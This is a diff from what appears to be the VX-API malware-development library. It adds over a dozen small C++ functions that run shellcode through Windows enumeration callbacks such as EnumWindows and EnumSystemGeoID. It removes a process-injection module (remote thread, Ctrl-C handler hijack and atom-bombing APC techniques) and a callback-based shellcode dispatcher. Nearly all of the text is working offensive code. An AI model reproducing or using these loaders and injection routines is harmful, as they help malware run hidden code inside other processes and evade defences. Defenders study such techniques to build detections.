+++ b/VX-API/MpfSceViaEnumPwrSchemes.cpp
@ -0,0 +1,21 @@
+#include "Win32Helper.h"
+
+VOID InvokeEnumPwrSchemesCallbackRoutine(LPVOID lpParameter)
+{
+	EnumPwrSchemes((PWRSCHEMESENUMPROC)lpParameter, NULL);
+}
+
+BOOL MpfSceViaEnumPwrSchemes(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
+{
+	LPVOID BinAddress = NULL;
+
+	BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+	if (BinAddress == NULL)
+		return FALSE;
+
+	CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
+
+	CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeEnumPwrSchemesCallbackRoutine, BinAddress, INFINITE);
+
+	return TRUE;
+}
--- a/VX-API/MpfSceViaEnumResourceTypesExW.cpp
+++ b/VX-API/MpfSceViaEnumResourceTypesExW.cpp
@ -0,0 +1,21 @@
+#include "Win32Helper.h"
+
+VOID InvokeEnumResourceTypesExWThreadCallbackRoutine(LPVOID lpParameter)
+{
+	EnumResourceTypesExW(NULL, (ENUMRESTYPEPROCW)lpParameter, NULL, RESOURCE_ENUM_VALIDATE, NULL);
+}
+
+BOOL MpfSceViaEnumResourceTypesExW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
+{
+	LPVOID BinAddress = NULL;
+
+	BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+	if (BinAddress == NULL)
+		return FALSE;
+
+	CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
+
+	CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeEnumResourceTypesExWThreadCallbackRoutine, BinAddress, INFINITE);
+
+	return TRUE;
+}
--- a/VX-API/MpfSceViaEnumSystemCodePagesW.cpp
+++ b/VX-API/MpfSceViaEnumSystemCodePagesW.cpp
@ -0,0 +1,21 @@
+#include "Win32Helper.h"
+
+VOID InvokeEnumSystemCodePagesWThreadCallbackRoutine(LPVOID lpParameter)
+{
+	EnumSystemCodePagesW((CODEPAGE_ENUMPROCW)lpParameter, CP_INSTALLED);
+}
+
+BOOL MpfSceViaEnumSystemCodePagesW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
+{
+	LPVOID BinAddress = NULL;
+
+	BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+	if (BinAddress == NULL)
+		return FALSE;
+
+	CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
+
+	CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeEnumSystemCodePagesWThreadCallbackRoutine, BinAddress, INFINITE);
+
+	return TRUE;
+}
--- a/VX-API/MpfSceViaEnumSystemGeoID.cpp
+++ b/VX-API/MpfSceViaEnumSystemGeoID.cpp
@ -0,0 +1,21 @@
+#include "Win32Helper.h"
+
+VOID InvokeEnumSystemGeoIDThreadCallbackRoutine(LPVOID lpParameter)
+{
+	EnumSystemGeoID(GEOCLASS_NATION, 0, (GEO_ENUMPROC)lpParameter);
+}
+
+BOOL MpfSceViaEnumSystemGeoID(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
+{
+	LPVOID BinAddress = NULL;
+
+	BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+	if (BinAddress == NULL)
+		return FALSE;
+
+	CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
+
+	CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeEnumSystemGeoIDThreadCallbackRoutine, BinAddress, INFINITE);
+
+	return TRUE;
+}
--- a/VX-API/MpfSceViaEnumSystemLanguageGroupsW.cpp
+++ b/VX-API/MpfSceViaEnumSystemLanguageGroupsW.cpp
@ -0,0 +1,21 @@
+#include "Win32Helper.h"
+
+VOID InvokeEnumSystemLanguageGroupsWThreadCallbackRoutine(LPVOID lpParameter)
+{
+	EnumSystemLanguageGroupsW((LANGUAGEGROUP_ENUMPROCW)lpParameter, LGRPID_SUPPORTED, NULL);
+}
+
+BOOL MpfSceViaEnumSystemLanguageGroupsW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
+{
+	LPVOID BinAddress = NULL;
+
+	BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+	if (BinAddress == NULL)
+		return FALSE;
+
+	CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
+
+	CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeEnumSystemLanguageGroupsWThreadCallbackRoutine, BinAddress, INFINITE);
+
+	return TRUE;
+}
--- a/VX-API/MpfSceViaEnumSystemLocalesEx.cpp
+++ b/VX-API/MpfSceViaEnumSystemLocalesEx.cpp
@ -0,0 +1,21 @@
+#include "Win32Helper.h"
+
+VOID InvokeEnumSystemLocalesExThreadCallbackRoutine(LPVOID lpParameter)
+{
+	EnumSystemLocalesEx((LOCALE_ENUMPROCEX)lpParameter, LOCALE_ALL, NULL, NULL);
+}
+
+BOOL MpfSceViaEnumSystemLocalesEx(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
+{
+	LPVOID BinAddress = NULL;
+
+	BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+	if (BinAddress == NULL)
+		return FALSE;
+
+	CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
+
+	CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeEnumSystemLocalesExThreadCallbackRoutine, BinAddress, INFINITE);
+
+	return TRUE;
+}
--- a/VX-API/MpfSceViaEnumThreadWindows.cpp
+++ b/VX-API/MpfSceViaEnumThreadWindows.cpp
@ -0,0 +1,21 @@
+#include "Win32Helper.h"
+
+VOID InvokeEnumThreadWindowsThreadCallbackRoutine(LPVOID lpParameter)
+{
+	EnumThreadWindows(0, (WNDENUMPROC)lpParameter, NULL);
+}
+
+BOOL MpfSceViaEnumThreadWindows(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
+{
+	LPVOID BinAddress = NULL;
+
+	BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+	if (BinAddress == NULL)
+		return FALSE;
+
+	CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
+
+	CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeEnumThreadWindowsThreadCallbackRoutine, BinAddress, INFINITE);
+
+	return TRUE;
+}
--- a/VX-API/MpfSceViaEnumTimeFormatsEx.cpp
+++ b/VX-API/MpfSceViaEnumTimeFormatsEx.cpp
@ -0,0 +1,21 @@
+#include "Win32Helper.h"
+
+VOID InvokeEnumTimeFormatsExCallbackRoutine(LPVOID lpParameter)
+{
+	EnumTimeFormatsEx((TIMEFMT_ENUMPROCEX)lpParameter, LOCALE_NAME_SYSTEM_DEFAULT, TIME_NOSECONDS, NULL);
+}
+
+BOOL MpfSceViaEnumTimeFormatsEx(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
+{
+	LPVOID BinAddress = NULL;
+
+	BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+	if (BinAddress == NULL)
+		return FALSE;
+
+	CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
+
+	CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeEnumTimeFormatsExCallbackRoutine, BinAddress, INFINITE);
+
+	return TRUE;
+}
--- a/VX-API/MpfSceViaEnumUILanguagesW.cpp
+++ b/VX-API/MpfSceViaEnumUILanguagesW.cpp
@ -0,0 +1,21 @@
+#include "Win32Helper.h"
+
+VOID InvokeEnumUILanguagesWCallbackRoutine(LPVOID lpParameter)
+{
+	EnumUILanguagesW((UILANGUAGE_ENUMPROCW)lpParameter, MUI_LANGUAGE_ID, NULL);
+}
+
+BOOL MpfSceViaEnumUILanguagesW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
+{
+	LPVOID BinAddress = NULL;
+
+	BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+	if (BinAddress == NULL)
+		return FALSE;
+
+	CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
+
+	CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeEnumUILanguagesWCallbackRoutine, BinAddress, INFINITE);
+
+	return TRUE;
+}
--- a/VX-API/MpfSceViaEnumWindowStationsW.cpp
+++ b/VX-API/MpfSceViaEnumWindowStationsW.cpp
@ -0,0 +1,21 @@
+#include "Win32Helper.h"
+
+VOID InvokeEnumWindowStationsWCallbackRoutine(LPVOID lpParameter)
+{
+	EnumWindowStationsW((WINSTAENUMPROCW)lpParameter, NULL);
+}
+
+BOOL MpfSceViaEnumWindowStationsW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
+{
+	LPVOID BinAddress = NULL;
+
+	BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+	if (BinAddress == NULL)
+		return FALSE;
+
+	CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
+
+	CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeEnumWindowStationsWCallbackRoutine, BinAddress, INFINITE);
+
+	return TRUE;
+}
--- a/VX-API/MpfSceViaEnumWindows.cpp
+++ b/VX-API/MpfSceViaEnumWindows.cpp
@ -0,0 +1,21 @@
+#include "Win32Helper.h"
+
+VOID InvokeEnumWindowsCallbackRoutine(LPVOID lpParameter)
+{
+	EnumWindows((WNDENUMPROC)lpParameter, NULL);
+}
+
+BOOL MpfSceViaEnumWindows(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
+{
+	LPVOID BinAddress = NULL;
+
+	BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+	if (BinAddress == NULL)
+		return FALSE;
+
+	CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
+
+	CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeEnumWindowsCallbackRoutine, BinAddress, INFINITE);
+
+	return TRUE;
+}
--- a/VX-API/MpfSceViaEnumerateLoadedModules64.cpp
+++ b/VX-API/MpfSceViaEnumerateLoadedModules64.cpp
@ -0,0 +1,21 @@
+#include "Win32Helper.h"
+
+VOID InvokeEnumerateLoadedModules64CallbackRoutine(LPVOID lpParameter)
+{
+	EnumerateLoadedModules64(InlineGetCurrentProcess, (PENUMLOADED_MODULES_CALLBACK64)lpParameter, NULL);
+}
+
+BOOL MpfSceViaEnumerateLoadedModules64(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
+{
+	LPVOID BinAddress = NULL;
+
+	BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+	if (BinAddress == NULL)
+		return FALSE;
+
+	CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
+
+	CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeEnumerateLoadedModules64CallbackRoutine, BinAddress, INFINITE);
+
+	return TRUE;
+}
--- a/VX-API/MpfSceViaK32EnumPageFilesW.cpp
+++ b/VX-API/MpfSceViaK32EnumPageFilesW.cpp
@ -0,0 +1,21 @@
+#include "Win32Helper.h"
+
+VOID InvokeK32EnumPageFilesWCallbackRoutine(LPVOID lpParameter)
+{
+	K32EnumPageFilesW((PENUM_PAGE_FILE_CALLBACKW)lpParameter, NULL);
+}
+
+BOOL MpfSceViaK32EnumPageFilesW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
+{
+	LPVOID BinAddress = NULL;
+
+	BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+	if (BinAddress == NULL)
+		return FALSE;
+
+	CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
+
+	CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeK32EnumPageFilesWCallbackRoutine, BinAddress, INFINITE);
+
+	return TRUE;
+}
--- a/VX-API/MpfSceViaMessageBoxIndirectW.cpp
+++ b/VX-API/MpfSceViaMessageBoxIndirectW.cpp
@ -0,0 +1,27 @@
+#include "Win32Helper.h"
+
+VOID InvokeMessageBoxIndirectWCallbackRoutine(LPVOID lpParameter)
+{
+	MSGBOXPARAMS MessageBoxParams = { 0 };
+	MessageBoxParams.cbSize = sizeof(MSGBOXPARAMS);
+	MessageBoxParams.dwStyle = MB_HELP;
+	MessageBoxParams.lpfnMsgBoxCallback = (MSGBOXCALLBACK)lpParameter;
+	MessageBoxParams.lpszText = L"";
+
+	MessageBoxIndirectW(&MessageBoxParams);
+}
+
+BOOL MpfSceViaMessageBoxIndirectW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
+{
+	LPVOID BinAddress = NULL;
+
+	BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+	if (BinAddress == NULL)
+		return FALSE;
+
+	CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
+
+	CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeMessageBoxIndirectWCallbackRoutine, BinAddress, INFINITE);
+
+	return TRUE;
+}
--- a/VX-API/ProcessInjectionMain.cpp
+++ b/VX-API/ProcessInjectionMain.cpp
@ -1,215 +0,0 @@
-#include "Win32Helper.h"
-
-DWORD ProcessInjectionMain(_In_ PPROCESS_INJECTION_INFORMATION Pii)
-{
-	DWORD dwReturn = ERROR_SUCCESS;
-	HANDLE hHandle = NULL;
-	LPVOID BaseAddress = NULL;
-	HANDLE hThread = NULL;
-	BOOL bFlag = FALSE;
-
-	switch (Pii->MethodEnum)
-	{
-		case E_WRITEPROCESSMEMORY_CREATEREMOTETHREAD_EXECUTESHELLCODE:
-		{
-			hHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, Pii->ProcessId);
-			if (hHandle == NULL)
-				break;
-
-			BaseAddress = VirtualAllocEx(hHandle, NULL, Pii->dwLengthOfPayloadInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
-			if (BaseAddress == NULL)
-				break;
-
-			if (!SetProcessPrivilegeToken(0))
-				break;
-
-			if (!WriteProcessMemory(hHandle, BaseAddress, Pii->Payload, Pii->dwLengthOfPayloadInBytes, NULL))
-				break;
-
-			hThread = CreateRemoteThread(hHandle, NULL, 0, (LPTHREAD_START_ROUTINE)BaseAddress, NULL, 0, NULL);
-			if (hThread == NULL)
-				break;
-
-			WaitForSingleObject(hThread, INFINITE);
-
-			bFlag = TRUE;
-
-			break;
-		}
-		
-		case E_CTRL_INJECT: //console applications only
-		{
-			DWORD ConsoleAttachList[2] = { 0 };
-			DWORD ParentId = 0;
-			PVOID EncodedAddress = NULL;
-			INPUT Input = { 0 };
-			MODULEINFO KernelbaseInformation = { 0 };
-			HWND hWindow = NULL;
-			HMODULE KernelBase = NULL, hModule = NULL;
-			RTLENCODEREMOTEPOINTER RtlEncodeRemotePointer = NULL;
-			DWORD64 Encoded = 0;
-
-			PCHAR KernelBaseDefaultHandler = NULL;
-			PCHAR KernelBaseSingleHandler = NULL;
-
-			KernelBase = GetModuleHandleEx2W(L"kernelbase.dll");
-			hModule = GetModuleHandleEx2W(L"ntdll.dll");
-
-			if (!KernelBase || !hModule)
-				break;
-
-			RtlEncodeRemotePointer = (RTLENCODEREMOTEPOINTER)GetProcAddressA((DWORD64)hModule, "RtlEncodeRemotePointer");
-			if (RtlEncodeRemotePointer == NULL)
-				break;
-
-			if (!K32GetModuleInformation(InlineGetCurrentProcess, KernelBase, &KernelbaseInformation, sizeof(KernelbaseInformation)))
-				break;
-
-			KernelBaseDefaultHandler = (PCHAR)MemoryFindMemory(KernelBase, KernelbaseInformation.SizeOfImage, (PVOID)"\x48\x83\xec\x28\xb9\x3a\x01\x00\xc0", 9);
-			if (KernelBaseDefaultHandler == NULL)
-				break;
-
-			Encoded = (DWORD64)EncodePointer(KernelBaseDefaultHandler);
-			if (Encoded == 0)
-				break;
-
-			KernelBaseSingleHandler = (PCHAR)MemoryFindMemory(KernelBase, KernelbaseInformation.SizeOfImage, &Encoded, 8);
-			if (KernelBaseSingleHandler == NULL)
-				break;
-
-			if (GetConsoleProcessList(ConsoleAttachList, 2) < 2)
-				break;
-
-			if (ConsoleAttachList[0] != GetCurrentProcessIdFromTeb())
-				ParentId = ConsoleAttachList[0];
-			else
-				ParentId = ConsoleAttachList[1];
-
-			FreeConsole();
-			AttachConsole(Pii->ProcessId);
-
-			hWindow = GetConsoleWindow();
-
-			FreeConsole();
-			AttachConsole(ParentId);
-
-			hHandle = OpenProcess(PROCESS_VM_WRITE | PROCESS_VM_OPERATION, FALSE, Pii->ProcessId);
-
-			BaseAddress = VirtualAllocEx(hHandle, NULL, Pii->dwLengthOfPayloadInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
-			if (BaseAddress == NULL)
-				break;
-
-			if (!WriteProcessMemory(hHandle, BaseAddress, Pii->Payload, Pii->dwLengthOfPayloadInBytes, NULL))
-				break;
-
-			CloseHandle(hHandle);
-
-			hHandle = OpenProcess(PROCESS_VM_WRITE | PROCESS_VM_OPERATION, FALSE, Pii->ProcessId); // PROCESS_VM_OPERATION is required for RtlEncodeRemotePointer
-			if (hHandle == NULL)
-				break;
-
-			RtlEncodeRemotePointer(hHandle, BaseAddress, &EncodedAddress);
-
-			if (!WriteProcessMemory(hHandle, KernelBaseSingleHandler, &EncodedAddress, 8, NULL))
-				break;
-
-			Input.type = INPUT_KEYBOARD;
-			Input.ki.wScan = 0;
-			Input.ki.time = 0;
-			Input.ki.dwExtraInfo = 0;
-			Input.ki.wVk = VK_CONTROL;
-			Input.ki.dwFlags = 0; // 0 for key press
-
-			SendInput(1, &Input, sizeof(INPUT));
-			Sleep(100);
-
-			PostMessageA(hWindow, WM_KEYDOWN, 'C', 0);
-
-			Sleep(100);
-
-			Input.type = INPUT_KEYBOARD;
-			Input.ki.wScan = 0;
-			Input.ki.time = 0;
-			Input.ki.dwExtraInfo = 0;
-			Input.ki.wVk = VK_CONTROL;
-			Input.ki.dwFlags = KEYEVENTF_KEYUP;
-			SendInput(1, &Input, sizeof(INPUT));
-
-			RtlEncodeRemotePointer(hHandle, KernelBaseDefaultHandler, &EncodedAddress);
-			WriteProcessMemory(hHandle, KernelBaseSingleHandler, &EncodedAddress, 8, NULL);
-
-			bFlag = TRUE;
-			break;
-		}
-
-		case E_QUEUE_USER_APC: //must use EBFB variant
-		{
-			NTQUEUEAPCTHREAD NtQueueApcThread = NULL;
-			HMODULE hModule = NULL;
-			ATOM Alpha = ERROR_SUCCESS, Bravo = ERROR_SUCCESS;
-			PCHAR pPayload = (PCHAR)Pii->Payload;
-
-			hModule = GetModuleHandleEx2W(L"ntdll.dll");
-			if (hModule == NULL)
-				break;
-
-			NtQueueApcThread = (NTQUEUEAPCTHREAD)GetProcAddressA((DWORD64)hModule, "NtQueueApcThread");
-			if (!NtQueueApcThread)
-				break;
-
-			hThread = OpenThread(THREAD_SET_CONTEXT | THREAD_QUERY_INFORMATION, FALSE, Pii->ThreadId);
-			if (hThread == NULL)
-				break;
-
-			hHandle = OpenProcess(0x001fffff, FALSE, GetProcessIdOfThread(hThread));
-			if (hHandle == NULL)
-				break;
-
-			BaseAddress = VirtualAllocEx(hHandle, NULL, Pii->dwLengthOfPayloadInBytes, 0x00003000, 0x00000040);
-			if (BaseAddress == NULL)
-				break;
-
-			Bravo = GlobalAddAtomA("b");
-			if (Bravo == 0)
-				break;
-
-			if (pPayload[0] == '\0')
-				break;
-
-			for (DWORD64 Position = Pii->dwLengthOfPayloadInBytes - 1; Position > 0; Position--)
-			{
-				if ((pPayload[Position] == '\0') && (pPayload[Position - 1] == '\0'))
-					NtQueueApcThread(hThread, GlobalGetAtomNameA, (PVOID)Bravo, (PVOID)(((DWORD64)BaseAddress) + Position - 1), (PVOID)2);
-			}
-
-			for (PCHAR Position = pPayload; Position < (pPayload + Pii->dwLengthOfPayloadInBytes); Position += strlen(Position) + 1)
-			{
-				if (*Position == '\0')
-					continue;
-
-				Alpha = GlobalAddAtomA(Position);
-				if (Alpha == 0)
-					break;
-
-				NtQueueApcThread(hThread, GlobalGetAtomNameA, (PVOID)Alpha, (PVOID)(((DWORD64)BaseAddress) + (Position - pPayload)), (PVOID)(strlen(Position) + 1));
-			}
-
-			QueueUserAPC((PAPCFUNC)BaseAddress, hThread, 0);
-
-		}
-
-		default:
-			break;
-	}
-
-	if (!bFlag)
-		dwReturn = GetLastErrorFromTeb();
-		
-	if (hThread)
-		CloseHandle(hThread);
-
-	if (hHandle)
-		CloseHandle(hHandle);
-
-	return dwReturn;
-}
--- a/VX-API/ShellcodeExecutionViaFunctionCallbackMain.cpp
+++ b/VX-API/ShellcodeExecutionViaFunctionCallbackMain.cpp
@ -1,267 +0,0 @@
-#include "Win32Helper.h"
-
-DWORD ShellcodeExecutionDispatchHandler(LPVOID Param)
-{
-	PSHELLCODE_EXECUTION_INFORMATION Sei = (PSHELLCODE_EXECUTION_INFORMATION)Param;
-	LPVOID BinAddress = NULL;
-	BOOL bFlag = FALSE;
-	HMODULE hModule = NULL;
-
-	BinAddress = VirtualAlloc(NULL, Sei->dwLengthOfPayloadInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
-	if (BinAddress == NULL)
-		goto EXIT_ROUTINE;
-
-	CopyMemoryEx(BinAddress, Sei->Payload, Sei->dwLengthOfPayloadInBytes);
-
-	switch (Sei->MethodEnum)
-	{
-		case E_CDEFFOLDERMENU_CREATE2:
-		{
-			IContextMenu* ContextMenuRequired = NULL;
-			CDefFolderMenu_Create2(NULL, NULL, 0, NULL, NULL, (LPFNDFMCALLBACK)BinAddress, 0, NULL, &ContextMenuRequired);
-			break;
-		}
-
-		case E_CERTENUMSYSTEMSTORE:
-		{
-			CertEnumSystemStore(CERT_SYSTEM_STORE_CURRENT_USER, NULL, NULL, (PFN_CERT_ENUM_SYSTEM_STORE)BinAddress);
-			break;
-		}
-		
-		case E_CERTENUMSYSTEMSTORELOCATION:
-		{
-			CertEnumSystemStoreLocation(NULL, NULL, (PFN_CERT_ENUM_SYSTEM_STORE_LOCATION)BinAddress);
-			break;
-		}
-
-		case E_ENUMCHILDWINDOWS:
-		{
-			EnumChildWindows(NULL, (WNDENUMPROC)BinAddress, NULL);
-			break;
-		}
-
-		case E_ENUMDATEFORMATSW:
-		{
-			EnumDateFormatsW((DATEFMT_ENUMPROCW)BinAddress, LOCALE_SYSTEM_DEFAULT, 0);
-			break;
-		}
-
-		case E_ENUMDESKTOPWINDOWS:
-		{
-			EnumDesktopWindows(GetThreadDesktop(GetCurrentThreadId()), (WNDENUMPROC)BinAddress, NULL);
-			break;
-		}
-
-		case E_ENUMDESKTOPSW:
-		{
-			EnumDesktopsW(GetProcessWindowStation(), (DESKTOPENUMPROCW)BinAddress, NULL);
-			break;
-		}
-
-		case E_ENUMDIRTREEW:
-		{
-			WCHAR DisposeableBuffer[512] = { 0 };
-
-			if (!SymInitialize(InlineGetCurrentProcess, NULL, TRUE))
-				goto EXIT_ROUTINE;
-
-			EnumDirTreeW(InlineGetCurrentProcess, L"C:\\Windows", L"*.log", DisposeableBuffer, (PENUMDIRTREE_CALLBACKW)BinAddress, NULL);
-
-			SymCleanup(InlineGetCurrentProcess);
-
-			break;
-		}
-
-		case E_ENUMDISPLAYMONITORS:
-		{
-			EnumDisplayMonitors(NULL, NULL, (MONITORENUMPROC)BinAddress, NULL);
-			break;
-		}
-
-		case E_ENUMFONTFAMILIESEXW:
-		{
-			LOGFONTW Font = { 0 };
-			Font.lfCharSet = DEFAULT_CHARSET;
-
-			EnumFontFamiliesExW(GetDC(NULL), &Font, (FONTENUMPROCW)BinAddress, NULL, NULL);
-			break;
-		}
-
-		case E_ENUMFONTSW:
-		{
-			EnumFontsW(GetDC(NULL), NULL, (FONTENUMPROCW)BinAddress, NULL);
-			break;
-		}
-
-		case E_ENUMLANGUAGEGROUPLOCALESW:
-		{
-			EnumLanguageGroupLocalesW((LANGGROUPLOCALE_ENUMPROCW)BinAddress, LGRPID_ARABIC, 0, 0);
-			break;
-		}
-
-		case E_ENUMOBJECTS:
-		{
-			LOGFONTW Font = { 0 };
-			Font.lfCharSet = DEFAULT_CHARSET;
-
-			EnumObjects(GetDC(NULL), OBJ_BRUSH, (GOBJENUMPROC)BinAddress, NULL);
-			break;
-		}
-
-		case E_ENUMRESOURCETYPESEXW:
-		{
-			EnumResourceTypesExW(NULL, (ENUMRESTYPEPROCW)BinAddress, NULL, RESOURCE_ENUM_VALIDATE, NULL);
-			break;
-		}
-
-		case E_ENUMSYSTEMCODEPAGES:
-		{
-			EnumSystemCodePagesW((CODEPAGE_ENUMPROCW)BinAddress, CP_INSTALLED);
-			break;
-		}
-
-		case E_ENUMSYSTEMGEOID:
-		{
-			EnumSystemGeoID(GEOCLASS_NATION, 0, (GEO_ENUMPROC)BinAddress);
-			break;
-		}
-
-		case E_ENUMSYSTEMLANGUAGEGROUPS:
-		{
-			EnumSystemLanguageGroupsW((LANGUAGEGROUP_ENUMPROCW)BinAddress, LGRPID_SUPPORTED, NULL);
-			break;
-		}
-
-		case E_ENUMSYSTEMLOCALESEX:
-		{
-			EnumSystemLocalesEx((LOCALE_ENUMPROCEX)BinAddress, LOCALE_ALL, NULL, NULL);
-			break;
-		}
-
-		case E_ENUMTHREADWINDOWS:
-		{
-			EnumThreadWindows(0, (WNDENUMPROC)BinAddress, NULL);
-			break;
-		}
-
-		case E_ENUMTIMEFORMATSEX:
-		{
-			EnumTimeFormatsEx((TIMEFMT_ENUMPROCEX)BinAddress, LOCALE_NAME_SYSTEM_DEFAULT, TIME_NOSECONDS, NULL);
-			break;
-		}
-
-		case E_ENUMUILANGUAGESW:
-		{
-			EnumUILanguagesW((UILANGUAGE_ENUMPROCW)BinAddress, MUI_LANGUAGE_ID, NULL);
-			break;
-		}
-
-		case E_ENUMWINDOWSTATIONSW:
-		{
-			EnumWindowStationsW((WINSTAENUMPROCW)BinAddress, NULL);
-			break;
-		}
-
-		case E_ENUMWINDOWS:
-		{
-			EnumWindows((WNDENUMPROC)BinAddress, NULL);
-			break;
-		}
-
-		case E_MESSAGEBOXINDIRECT:
-		{
-			MSGBOXPARAMS MessageBoxParams = { 0 };
-			MessageBoxParams.cbSize = sizeof(MSGBOXPARAMS);
-			MessageBoxParams.dwStyle = MB_HELP;
-			MessageBoxParams.lpfnMsgBoxCallback = (MSGBOXCALLBACK)BinAddress;
-			MessageBoxParams.lpszText = L"[Unstable] Help Executes Shellcode";
-
-			MessageBoxIndirect(&MessageBoxParams);
-
-			break;
-		}
-
-		case E_ENUMERATELOADEDMODULES:
-		{
-			EnumerateLoadedModules64(InlineGetCurrentProcess, (PENUMLOADED_MODULES_CALLBACK64)BinAddress, NULL);
-			break;
-		}
-
-		case E_ENUMPAGEFILESW:
-		{
-			K32EnumPageFilesW((PENUM_PAGE_FILE_CALLBACKW)BinAddress, NULL);
-			break;
-		}
-
-		case E_ENUMPWRSCHEMES:
-		{
-			EnumPwrSchemes((PWRSCHEMESENUMPROC)BinAddress, NULL);
-			break;
-		}
-
-		case E_DNSQUERYEX:
-		{
-			//needs to be debugged
-
-			/*
-			DNS_QUERY_REQUEST Request = { 0 };
-			DNS_QUERY_RESULT Result = { 0 };
-			
-			Request.Version = DNS_QUERY_REQUEST_VERSION1;
-			Request.QueryName = NULL;
-			Request.QueryType = DNS_TYPE_A;
-			Request.QueryOptions = DNS_QUERY_STANDARD;
-			Request.InterfaceIndex = 0;
-			Request.pQueryCompletionCallback = (PDNS_QUERY_COMPLETION_ROUTINE)BinAddress;
-
-			DnsQueryEx(&Request, &Result, NULL);
-			*/
-
-		}
-
-		case E_RTLUSERFIBERSTART:
-		{
-			RTLUSERFIBERSTART RtlUserFiberStart = NULL;
-			DWORD64 FiberData = NULL;
-			PTEB Teb = GetTeb();
-
-			RtlUserFiberStart = (RTLUSERFIBERSTART)GetProcAddressW((DWORD64)GetModuleHandleEx2W(L"ntdll.dll"), L"RtlUserFiberStart");
-			if (RtlUserFiberStart == NULL)
-				goto EXIT_ROUTINE;
-
-			Teb->SameTebFlags |= 0b100;
-
-			FiberData = (DWORD64)HeapAlloc(GetProcessHeapFromTeb(), HEAP_ZERO_MEMORY, 0x100);
-			if (FiberData == NULL)
-				goto EXIT_ROUTINE;
-
-			*(LPVOID*)(FiberData + 0x0a8) = BinAddress;
-
-			__writegsqword(0x20, FiberData);
-
-			RtlUserFiberStart();
-
-		}
-
-		default:
-			goto EXIT_ROUTINE;
-
-	}
-
-	bFlag = TRUE;
-
-EXIT_ROUTINE:
-
-	if (hModule)
-		FreeLibrary(hModule);
-
-	if (BinAddress)
-		VirtualFree(BinAddress, 0, MEM_RELEASE);
-
-	return (bFlag ? 0 : 0xffffffff);
-}
-
-BOOL ShellcodeExecutionViaFunctionCallbackMain(_In_ PSHELLCODE_EXECUTION_INFORMATION Sei)
-{
-	return CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)ShellcodeExecutionDispatchHandler, Sei, INFINITE);
-}
